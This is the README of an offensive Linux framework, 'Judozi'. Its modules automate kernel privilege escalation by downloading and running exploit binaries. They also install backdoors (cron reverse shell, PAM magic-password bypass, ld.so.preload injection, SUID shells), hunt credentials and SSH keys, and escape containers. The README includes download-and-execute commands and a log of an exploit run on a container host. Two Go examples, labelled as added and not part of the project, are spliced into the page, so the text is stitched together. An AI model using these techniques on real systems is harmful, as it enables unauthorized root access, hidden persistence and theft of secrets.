Framework features:
- Modular Plugin System: drop-in module support
- Module Registry: auto-discovery and loading
- Interactive UI: clean module selection menu
- Command-line Interface: direct module execution
- Extensible Architecture: easy to add new modules
- Zero Dependencies: pure Go, static binary

Kernel module features:
- Dynamic Exploit Library: kernel 2.6.22 to 6.7.1 coverage
- Smart Detection: auto-detects vulnerabilities
- Hybrid Execution: compile or precompiled
- GCC-Free Mode: works without a compiler
- Binary Fallback: download when needed
- Automatic Mode: try all exploits
Download the prebuilt binary:
wget https://github.com/past3l/judozi/raw/main/judozi && chmod +x judozi && ./judozi

Or build from source:
git clone https://github.com/past3l/judozi.git
cd judozi
CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi ./cmd/judozi
./judozi

Run Judozi and select a module interactively:
./judozi
Modular Offensive Security Framework v2.0
Author: past3l@mileniumsec
GitHub: github.com/past3l/judozi

SELECT MODULE:
[1] kernel    privesc - Automated Linux Kernel Privilege Escalation
Enter number (1-N) or 'q' to quit
>
Run a specific module directly:
# Run kernel module interactively
./judozi kernel
# List all kernel exploits
./judozi kernel -list
# Automatic mode (try all matching exploits)
./judozi kernel -auto
# Target specific CVE
./judozi kernel -cve CVE-2022-0847
# Use custom exploit mirror
./judozi kernel -mirror https://example.com/exploits

# List all available modules
./judozi -l
./judozi --list
# Show help
./judozi -h
./judozi --help
# Run a module with args
./judozi [module] [module-args]

kernel: Automated Linux kernel privilege escalation framework with 19+ exploits.
Features:
- Smart kernel version detection
- Automatic exploit matching
- Hybrid execution (compile or precompiled)
- GCC-free mode with binary fallback
- Range: Kernel 2.6.22 to 6.7.1

./judozi kernel                    # Interactive mode
./judozi kernel -list              # List all exploits
./judozi kernel -auto              # Try all matching
./judozi kernel -cve CVE-2022-0847 # Target specific CVE

persistence: 8 proven persistence techniques with stealth rating and reboot survival info.
Techniques:
- SSH authorized_keys injection
- Cron reverse shell (every 10 min)
- Systemd service (system-monitor)
- Custom SUID binary
- /etc/ld.so.preload shared lib injection
- PAM auth bypass (magic password backdoor)
- .bashrc/.profile injection
- SUID bash copy

./judozi persistence         # Interactive selection
./judozi persistence -list   # List all techniques
./judozi persistence 3       # Install technique #3
./judozi persistence -remove # Remove installed backdoors

recon: 12 parallel reconnaissance techniques. All output is auto-saved to the ./recon/ directory.
Techniques:
- System info (OS, CPU, memory, kernel, env, installed tools)
- Network enumeration (interfaces, routes, ports, ARP, DNS, firewall rules)
- User & group enumeration (sudoers, shadow, login history, dotfiles)
- SUID/SGID binaries + GTFOBins detection
- Process enumeration (cmdlines, root procs, env secrets)
- Credential hunting (SSH keys, .env, config files, AWS/k8s creds)
- Cron & scheduled tasks (crontab, systemd timers, at jobs)
- Service enumeration (systemd, init.d, versions)
- Container & Docker recon (socket, cgroups, namespaces, metadata service)
- Environment secrets (env vars, /proc env, process cmdlines)
- SSH & lateral movement (known_hosts, agent sockets, authorized_keys)
- Filesystem (writable dirs/files, sensitive files, backup files, logs)

./judozi recon           # Run all 12 techniques in parallel, saves to ./recon/
./judozi recon -list     # List techniques
./judozi recon 1 4 7     # Run specific techniques by ID
./judozi recon -dir /tmp # Save to custom directory
./judozi recon -nosave   # Print to stdout only

- container - Container escape techniques (Docker socket, cgroup v1, privileged, overlay)
Constantly updated repository of kernel privilege escalation vulnerabilities
JUDOZI FRAMEWORK PIPELINE

[1] INIT
  - Load module registry
  - Auto-discover modules
  - Initialize UI

[2] MODULE SELECTION
  - Interactive menu
  - Direct CLI execution
  - Validate availability

[3] EXECUTION
  - Load selected module
  - Pass arguments
  - Execute module.Run()
Module Interface:
type Module interface {
    Name() string
    Description() string
    Category() string
    Run(args []string) error
}

Project structure:
judozi/
├── cmd/judozi/main.go   # Entry point, module registry
├── modules/
│   ├── kernel/          # Kernel privesc (19 CVEs)
│   ├── persistence/     # 8 persistence techniques
│   ├── recon/           # 12 recon techniques
│   └── techniques/
├── pkg/
│   ├── module/          # Module interface + registry
│   ├── shell/           # Interactive shell
│   └── ui/              # Terminal UI helpers
├── binaries/            # Precompiled exploit binaries
├── go.mod
└── README.md
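The Module interface above and the registry.Register call in the contributing section say what a module looks like but not what the registry does with it. The following is an added example and not the project's pkg/module code: a hypothetical Registry that refuses empty and duplicate names (so a dropped-in module cannot silently shadow a built-in one), lists modules in sorted order for the menu and -l, and dispatches the ./judozi [module] [module-args] form, returning an error for an unknown module instead of doing nothing. EchoModule is a constructed sample module that only records its arguments.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
)

// Module is the interface from the README's "Module Interface" section;
// every drop-in module implements it.
type Module interface {
	Name() string
	Description() string
	Category() string
	Run(args []string) error
}

// Registry is a hypothetical stand-in for the pkg/module registry. It maps
// module names to implementations and refuses duplicate names so a later
// registration cannot silently shadow an earlier module.
type Registry struct {
	modules map[string]Module
}

// NewRegistry returns an empty registry.
func NewRegistry() *Registry {
	return &Registry{modules: map[string]Module{}}
}

// Register adds m, rejecting empty and duplicate names.
func (r *Registry) Register(m Module) error {
	name := m.Name()
	if name == "" {
		return errors.New("module has an empty name")
	}
	if _, exists := r.modules[name]; exists {
		return fmt.Errorf("module %q is already registered", name)
	}
	r.modules[name] = m
	return nil
}

// Names lists registered module names in sorted order (for the menu and -l).
func (r *Registry) Names() []string {
	names := make([]string, 0, len(r.modules))
	for name := range r.modules {
		names = append(names, name)
	}
	sort.Strings(names)
	return names
}

// Get looks a module up by name; the second value reports whether it exists.
func (r *Registry) Get(name string) (Module, bool) {
	m, ok := r.modules[name]
	return m, ok
}

// Dispatch mirrors the CLI form `./judozi [module] [module-args]`: the first
// argument selects the module and the rest go to its Run method. An unknown
// module name is an error rather than a silent no-op.
func (r *Registry) Dispatch(argv []string) error {
	if len(argv) == 0 {
		return errors.New("usage: judozi <module> [module-args]")
	}
	m, ok := r.Get(argv[0])
	if !ok {
		return fmt.Errorf("unknown module %q (available: %v)", argv[0], r.Names())
	}
	return m.Run(argv[1:])
}

// EchoModule is a constructed sample module that only records the arguments
// it was invoked with, so the dispatch path can be checked without side effects.
type EchoModule struct {
	LastArgs []string
}

func (e *EchoModule) Name() string        { return "echo" }
func (e *EchoModule) Description() string { return "Records its arguments" }
func (e *EchoModule) Category() string    { return "example" }
func (e *EchoModule) Run(args []string) error {
	e.LastArgs = append([]string(nil), args...)
	return nil
}

func main() {
	reg := NewRegistry()
	echo := &EchoModule{}
	if err := reg.Register(echo); err != nil {
		fmt.Println("register:", err)
	}
	// A second registration under the same name is refused.
	if err := reg.Register(&EchoModule{}); err != nil {
		fmt.Println("register:", err)
	}
	fmt.Println("modules:", reg.Names())
	if err := reg.Dispatch([]string{"echo", "-list"}); err != nil {
		fmt.Println("dispatch:", err)
	}
	fmt.Println("echo received:", echo.LastArgs)
	if err := reg.Dispatch([]string{"nope"}); err != nil {
		fmt.Println("dispatch:", err)
	}
}
```

The duplicate-name check is the part worth keeping in any plugin registry: with auto-discovery, whichever module registers last would otherwise win, and a stray file in modules/ could replace a built-in without any visible error.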
nextjs@container:/tmp$ uname -r
5.15.0-1102-azure
nextjs@container:/tmp$ ./judozi
[*] Kernel: 5.15.0
[+] Found 10 potential exploit(s)
> all
[!] GCC not available, downloading precompiled binary
[*] Downloading CVE-2024-1086...
[+] Binary downloaded successfully
[*] Executing exploit...
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...

This tool is designed exclusively for:
YOU MUST HAVE EXPLICIT PERMISSION to use this tool on any system.

ALLOWED:
- Testing your own systems
- Authorized pentesting
- Educational research
- CTF competitions

ILLEGAL:
- Unauthorized access
- Systems you don't own
- Malicious intent
- Illegal privilege escalation
- Go 1.22 or higher
- No other dependencies required (CGO disabled)

# Standard build (static binary)
CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi ./cmd/judozi
# Cross-compile for ARM64
GOARCH=arm64 CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi-arm64 ./cmd/judozi
# Cross-compile for 32-bit
GOARCH=386 CGO_ENABLED=0 go build -ldflags="-s -w" -o judozi-i386 ./cmd/judozi
# Debug build (with symbols)
CGO_ENABLED=0 go build -o judozi-debug ./cmd/judozi

Build flags:
- CGO_ENABLED=0: produce a pure static binary
- -ldflags="-s -w": strip debug symbols (smaller size)
- -o judozi: output filename
- ./cmd/judozi: entry point path
Contributions are welcome! Here's how you can help:

Modules
Create a new module by implementing the Module interface:
package mymodule

import "github.com/judozi/judozi/pkg/module"

type MyModule struct{}

func New() module.Module {
    return &MyModule{}
}

func (m *MyModule) Name() string {
    return "mymodule"
}

func (m *MyModule) Description() string {
    return "My awesome module"
}

func (m *MyModule) Category() string {
    return "exploitation"
}

func (m *MyModule) Run(args []string) error {
    // Your module logic here
    return nil
}

Then register it in cmd/judozi/main.go:
registry.Register(mymodule.New())

Exploits
- Add exploit metadata to modules/kernel/pkg/vulndb/exploits.json:
{
"id": "CVE-XXXX-XXXXX",
"name": "Exploit Name",
"description": "Technical description",
"min_kernel": "X.X.X",
"max_kernel": "X.X.X",
"arch": ["amd64"],
"source": "https://github.com/.../exploit.c",
"binary": "https://raw.githubusercontent.com/past3l/judozi/main/binaries/CVE-XXXX-XXXXX",
"compile": "gcc -o {bin} {src} -static",
"execute": "{bin}",
"requirements": ["gcc"],
"tags": ["tag1", "tag2"],
"references": ["https://nvd.nist.gov/..."]
}
- Compile the static binary and add it to modules/kernel/binaries/
- Test on the target kernel version
- Submit a pull request
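The min_kernel, max_kernel and arch fields in the record above are what the kernel module's automatic exploit matching compares against the running kernel, but the comparison itself is not on the page. The following is an added example and not the project's vulndb code: it parses a uname -r string such as the 5.15.0-1102-azure from the session above, checks it against each record's inclusive range and arch list, and skips records whose bounds are still the X.X.X template so an unfilled entry can never match. The same range check tells a defender whether a host's kernel falls inside a record's affected versions. SampleDB is constructed sample data with placeholder ids and ranges, not the project's database.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// ExploitEntry declares only the exploits.json fields needed for matching;
// the other fields of the README's record are ignored by the decoder.
type ExploitEntry struct {
	ID        string   `json:"id"`
	MinKernel string   `json:"min_kernel"`
	MaxKernel string   `json:"max_kernel"`
	Arch      []string `json:"arch"`
}

// KernelVersion is the numeric major.minor.patch triple of a release string.
type KernelVersion [3]int

// ParseKernelVersion turns "5.15.0-1102-azure" into [5 15 0]: the distro
// suffix after the first '-' is dropped and missing components default to 0.
// Non-numeric input (such as the "X.X.X" template placeholder) is an error.
func ParseKernelVersion(s string) (KernelVersion, error) {
	var v KernelVersion
	base := strings.SplitN(strings.TrimSpace(s), "-", 2)[0]
	parts := strings.Split(base, ".")
	if base == "" || len(parts) > 3 {
		return v, fmt.Errorf("malformed kernel version %q", s)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("malformed kernel version %q", s)
		}
		v[i] = n
	}
	return v, nil
}

// Compare returns -1, 0 or 1 as v is below, equal to or above other.
func (v KernelVersion) Compare(other KernelVersion) int {
	for i := 0; i < 3; i++ {
		if v[i] < other[i] {
			return -1
		}
		if v[i] > other[i] {
			return 1
		}
	}
	return 0
}

// InRange reports whether v lies within [lo, hi], both bounds inclusive.
func (v KernelVersion) InRange(lo, hi KernelVersion) bool {
	return v.Compare(lo) >= 0 && v.Compare(hi) <= 0
}

// MatchExploits returns the ids of entries whose kernel range and arch list
// cover the host. Entries with unparsable bounds are skipped, never matched
// by accident.
func MatchExploits(entries []ExploitEntry, kernel, arch string) ([]string, error) {
	host, err := ParseKernelVersion(kernel)
	if err != nil {
		return nil, err
	}
	var ids []string
	for _, e := range entries {
		lo, errLo := ParseKernelVersion(e.MinKernel)
		hi, errHi := ParseKernelVersion(e.MaxKernel)
		if errLo != nil || errHi != nil {
			continue
		}
		if host.InRange(lo, hi) && containsString(e.Arch, arch) {
			ids = append(ids, e.ID)
		}
	}
	return ids, nil
}

func containsString(list []string, want string) bool {
	for _, s := range list {
		if s == want {
			return true
		}
	}
	return false
}

// LoadEntries decodes a JSON array of records in the exploits.json shape.
func LoadEntries(data []byte) ([]ExploitEntry, error) {
	var entries []ExploitEntry
	if err := json.Unmarshal(data, &entries); err != nil {
		return nil, fmt.Errorf("decode exploits.json: %w", err)
	}
	return entries, nil
}

// SampleDB is constructed sample data with placeholder ids and ranges.
const SampleDB = `[
  {"id": "CVE-XXXX-0001", "min_kernel": "5.8.0",  "max_kernel": "5.16.11", "arch": ["amd64"]},
  {"id": "CVE-XXXX-0002", "min_kernel": "2.6.22", "max_kernel": "3.9.0",   "arch": ["amd64"]},
  {"id": "CVE-XXXX-0003", "min_kernel": "4.4.0",  "max_kernel": "6.7.1",   "arch": ["arm64"]},
  {"id": "CVE-XXXX-0004", "min_kernel": "X.X.X",  "max_kernel": "X.X.X",   "arch": ["amd64"]}
]`

func main() {
	entries, err := LoadEntries([]byte(SampleDB))
	if err != nil {
		fmt.Println(err)
		return
	}
	ids, err := MatchExploits(entries, "5.15.0-1102-azure", "amd64")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println("matching entries:", ids) // only CVE-XXXX-0001 for this host
}
```

Note that a three-part range compare is only as good as the bounds in the database: distribution kernels carry backported fixes that a major.minor.patch range cannot see, which is why the README's record keeps a source and references field for a human to check against the vendor's advisory.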
Educational Use Only
This project is provided for educational and research purposes. Exploit code belongs to the original authors and researchers. See individual exploit references for specific licensing.

Exploit Sources

past3l @ mileniumsec

Special thanks to:
- Research Organizations
- Notable Researchers

Use this tool ethically and legally. Always obtain proper authorization. Made by past3l | Star this repo if you find it useful